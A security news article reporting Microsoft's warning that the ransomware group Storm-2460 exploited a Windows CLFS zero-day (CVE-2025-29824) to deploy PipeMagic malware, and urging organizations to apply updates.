Tech giant Microsoft has issued a warning that threat actors have been exploiting a zero-day vulnerability in a widely targeted Windows logging system. This flaw, found in the Common Log File System (CLFS), has been used by ransomware actors to launch attacks against organizations in various sectors.
According to Microsoft, the hackers have targeted a small number of organizations, including those in the U.S. real estate sector, a Spanish software firm, the financial sector in Venezuela, and the retail sector in Saudi Arabia. The Cybersecurity and Infrastructure Security Agency has added this vulnerability, identified as CVE-2025-29824, to its Known Exploited Vulnerabilities Catalog with a CVSS score of 7.8.
The ransomware threat actor responsible for exploiting this flaw is known as Storm-2460, who used it to deploy PipeMagic malware. Microsoft has urged organizations to apply all available security updates for elevation of privilege flaws to defend against ransomware attacks. They emphasized the importance of implementing these updates to prevent threat actors from gaining an initial foothold on compromised devices.
In a blog post, Microsoft disclosed that they have not yet determined how Storm-2460 gained access to compromised devices. The group utilized the Windows certutil utility to download malware from a legitimate third-party site they had compromised previously. By deploying PipeMagic and executing the log system exploit directly in memory without writing files to disk, the attackers were able to evade detection.
To address this issue, Microsoft released security updates and reassured customers that those running Windows 11, version 24H2 are not affected by the observed exploitation, even if the vulnerability exists. Despite the proactive measures taken by Microsoft, the company has not provided additional information on how Storm-2460 initially infiltrated compromised devices.
This incident highlights the ongoing threat posed by ransomware actors exploiting vulnerabilities in widely used systems. Organizations are advised to stay vigilant and apply necessary security updates to mitigate the risk of falling victim to such attacks. Microsoft’s efforts to address this issue demonstrate the importance of proactive security measures in safeguarding against cyber threats.